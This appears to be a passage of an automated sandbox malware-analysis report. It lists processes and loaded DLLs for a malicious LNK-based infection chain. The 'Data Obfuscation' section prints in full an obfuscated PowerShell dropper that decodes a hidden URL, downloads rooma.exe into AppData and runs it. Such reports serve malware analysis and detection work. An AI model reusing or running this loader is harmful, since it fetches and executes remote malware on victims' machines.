Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\rooma.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: Offer Document 24.lnk LNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\netbtugc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509569142.000000000093E000.00000002.00000001.01000000.0000000F.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3835791567.000000000093E000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: wntdll.pdbUGP source: rooma.exe, 00000007.00000003.1492774840.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.00000000016FE000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000003.1490722054.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1606101390.0000000002D06000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1604040485.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: rooma.exe, rooma.exe, 00000007.00000003.1492774840.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.00000000016FE000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000003.1490722054.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1606101390.0000000002D06000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1604040485.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb source: rooma.exe, 00000007.00000003.1572934772.000000000101D000.00000004.00000020.00020000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3835614650.0000000000E38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL source: rooma.exe, 00000007.00000003.1572934772.000000000101D000.00000004.00000020.00020000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3835614650.0000000000E38000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFB4A342DEB push ecx; rep ret 5_2_00007FFB4A342DEC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B48A9 push esp; ret 7_2_009B48AA
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009CE2BA push 00000038h; iretd 7_2_009CE2BE
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009C8C92 pushad ; retf 7_2_009C8C93
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009CA436 push ebx; iretd 7_2_009CA600
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009CA5D9 push ebx; iretd 7_2_009CA600
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B3780 push eax; ret 7_2_009B3782
